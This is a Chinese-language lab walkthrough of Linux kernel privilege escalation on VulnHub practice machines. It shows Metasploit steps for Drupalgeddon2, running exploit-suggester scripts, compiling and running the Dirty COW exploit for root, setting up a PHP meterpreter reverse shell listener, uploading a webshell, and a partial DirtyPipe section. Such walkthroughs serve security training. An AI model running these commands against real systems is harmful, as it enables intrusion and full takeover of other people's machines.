当前位置: 首页 > news >正文

Linux权限提升-内核溢出

一:Web到Linux-内核溢出Dcow

复现环境:https://www.vulnhub.com/entry/lampiao-1,249/

1.信息收集:探测⽬标ip及开发端⼝

2.Web漏洞利⽤:

查找drupal相关漏洞
search drupal
# 进⾏漏洞利⽤
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.   .  
set rport 1898
run

 

3.内核提权:

# 上传内核漏洞检测脚本
upload /root/linux-exploit-suggester.sh /tmp/1.sh
# 进⼊shell,并执⾏提权辅助脚本
shell
cd /tmp
chmod +x 1.sh
./1.sh

 

 https://github.com/gbonacini/CVE-2016-5195

4.发现提权漏洞,上传提权利⽤程序dcow.cpp到服务器
 exit
 upload /root/dcow.cpp /tmp/dcow.cpp 

5. 编译漏洞利⽤程序成功后会在当前⽬录⽣成dcow
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
ls
# 由于本身的终端问题,所以使⽤python终端
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
# 漏洞利⽤成功后使⽤root⽤户密码dirtyCowFun进⾏登录即可
su root
whoami

二:Web到Linux-内核溢出Pwnkit 

复现环境:https://www.vulnhub.com/entry/darkhole-1,724/

1.信息收集:探测⽬标ip及开发端⼝

2.Web漏洞利⽤:

重置管理密码,注册新账号,使⽤注册⽤户登录,并重置密码,

使用Bp抓包进行修改管理员密码进入后台 ,上传一句话木马进入

3. 反弹MSF

将内核检测脚本和综合检测脚本都上传到⽬标服务器的/tmp⽬录

4.启动msf
└─# msfdb run
# 监听本地6666端⼝等待php反弹后⻔连接
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666(端口自己设置)
run

 

5.内核提权

通过xftp8上传两个文件linux-exploit-suggester.sh      linpeas.sh

进⼊shell
shell
cd /tmp
chmod +x linpeas.sh
chmod +x linux-exploit-suggester.sh

运行两个文件

 查找漏洞利⽤模块  使⽤提权漏洞利⽤模块   在获取的shell中查看当前⽤户权限

 

Web到Linux-内核溢出-DirtyPipe

复现环境:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/ 

1.信息收集:

 

2.Web漏洞利⽤

 ⽬录扫描  dirb  http://192.168.   . 

访问http://192.168.   .   /graffiti.php进⾏功能测试并抓包

3. 写⼊⼀句话⽊⻢发送恶意代码,并使⽤哥斯拉连接

4. 反弹MSF

5. 内核提权

上传提权内核漏洞检测辅助脚本

进⼊shell进⾏提权漏洞检测
shell
cd /tmp
chmod +x 1.sh
./1.sh

 

http://www.lryc.cn/news/536418.html

相关文章:

  • 【环境安装】重装Docker-26.0.2版本
  • 【云安全】云原生- K8S API Server 未授权访问
  • 笔记7——条件判断
  • Word 公式转 CSDN 插件 发布
  • 二次封装axios解决异步通信痛点
  • 算法——结合实例了解深度优先搜索(DFS)
  • 数据结构(考研)
  • 使用SSE协议进行服务端向客户端主动发送消息
  • FastAPI 高并发与性能优化
  • DFS+回溯+剪枝(深度优先搜索)——搜索算法
  • 在cursor/vscode中使用godot C#进行游戏开发
  • vant4 van-list组件的使用
  • 介绍 Liquibase、Flyway、Talend 和 Apache NiFi:选择适合的工具
  • 攻防世界33 catcat-new【文件包含/flask_session伪造】
  • Git -> Git配置密钥对,并查看公钥
  • 淘宝订单列表Fragment转场动画卡顿解决方案
  • 【ESP32指向鼠标】——icm20948与esp32通信
  • Xcode证书密钥导入
  • Ubuntu安装PgSQL17
  • K8S容器启动提示:0/2 nodes are available: 2 Insufficient cpu.
  • LabVIEW外腔二极管激光器稳频实验
  • 笔记6——字典dict(dictionary)
  • 【MySQL】InnoDB单表访问方法
  • APP端网络测试与弱网模拟!
  • 【个人开发】deepseed+Llama-factory 本地数据多卡Lora微调
  • Redis7.0八种数据结构底层原理
  • Kafka 高吞吐量的底层技术原理
  • CCFCSP第34次认证第一题——矩阵重塑(其一)
  • 网络工程师 (35)以太网通道
  • O1、R1和V3模型